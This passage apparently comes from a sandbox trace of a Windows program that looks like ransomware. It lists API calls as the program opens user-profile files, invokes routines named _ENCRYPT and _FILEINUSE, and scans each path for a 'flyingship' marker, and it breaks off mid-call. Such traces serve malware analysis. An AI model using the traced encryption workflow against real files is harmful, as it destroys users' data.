[0188.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.451] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.451] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.451] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.451] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.451] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.451] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.451] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.451] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.451] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.452] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.452] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.452] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.452] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.452] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.452] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.452] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.452] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.452] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.452] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.453] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.453] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.453] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.453] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.453] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.453] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.453] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.453] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.453] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.453] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.453] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.454] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.454] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0188.454] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.454] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.454] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.454] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yes", cchCount1=3, lpString2="no", cchCount2=2) returned 3 [0188.454] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.454] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.454] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.454] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.454] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.455] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.455] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.455] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.455] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.455] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.456] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.456] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.456] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.456] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.456] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.456] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.456] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.457] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.457] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.457] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ntuser.ini", cAlternateFileName="")) returned 0x90add8 [0188.457] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.ini", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="ntuser.ini", cAlternateFileName="")) returned 0x90add8 [0188.458] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.458] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.458] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0188.458] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.458] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0188.459] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.459] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\cczf5rk8bht5t.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0188.460] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.460] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.460] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.460] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0188.460] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.460] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.461] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0188.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0188.461] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.461] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0188.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.461] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0188.461] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0188.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.461] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.461] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0x90add8 [0188.461] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.462] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.462] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa302f6a0, ftCreationTime.dwHighDateTime=0x1d5dfb6, ftLastAccessTime.dwLowDateTime=0xcdcdd000, ftLastAccessTime.dwHighDateTime=0x1d5dd2a, ftLastWriteTime.dwLowDateTime=0xcdcdd000, ftLastWriteTime.dwHighDateTime=0x1d5dd2a, nFileSizeHigh=0x0, nFileSizeLow=0x15d8a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="cczF5rK8bHt5T.gif", cAlternateFileName="CCZF5R~1.GIF")) returned 0x90add8 [0188.462] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0188.462] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.462] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.463] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0188.464] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cczF5rK8bHt5T.gif\"", cchCount1=10, lpString2="flyingship", 